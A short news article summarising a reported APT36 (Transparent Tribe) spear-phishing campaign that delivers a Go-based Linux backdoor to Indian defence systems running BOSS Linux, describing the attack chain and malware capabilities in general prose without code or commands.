Are Pakistani Hackers Using Linux Malware To Target India? Here’s the Breakdown

Is it true that Pakistan-linked espionage group APT36 is wreaking havoc on Indian cybersecurity departments? If reports are to be believed, then it may be the case.

Pakistani hacker group APT36 or Transparent Tribe has launched a sophisticated Linux malware attack targeting Indian defence networks powered by BOSS Linux. Interestingly, the malware runs on India’s own Debian-based operating system used across government agencies.

The attack chain was first observed by cybersecurity firm Cyfirma on June 7, 2025. Attackers trick recipients via spear-phishing emails disguised as “Cyber-Security-Advisory.zip.” These archives contain a .desktop shortcut file, common in Linux, that once opened performs a dual action.

One, it displays a seemingly harmless PowerPoint document as a decoy. Two, quietly, it downloads and executes an ELF binary named client.elf, also known as BOSS.elf, written in Go language and intended to compromise systems and maintain covert remote access.

Analysis shows the ELF malware gathers system metadata such as hostname, CPU, and RAM, and enumerates mounted drives and directories. It logs activity and maintains stealth using obfuscated patterns, allowing real-time control via its C2 channel.

Key functionalities of this Linux malware include screenshot capture, file transfer, remote command implementation, and persistent keep-alive communication every 30 seconds.

APT36 has previously been accused of Windows spyware, phishing macros, and malicious ISOs. They have accelerated its sophistication throughout 2025. Their previous campaigns employed influenza events and ongoing tensions to deliver phishing via fake government domains, ISO images, and social-engineered PDF lures.

Ever since the nuclear-armed neighbors skirmished in May this year, tensions are high with no diplomatic efforts on the horizon. In times like these, a digital and cyber warzone can create unnecessary nuisance from a defense perspective.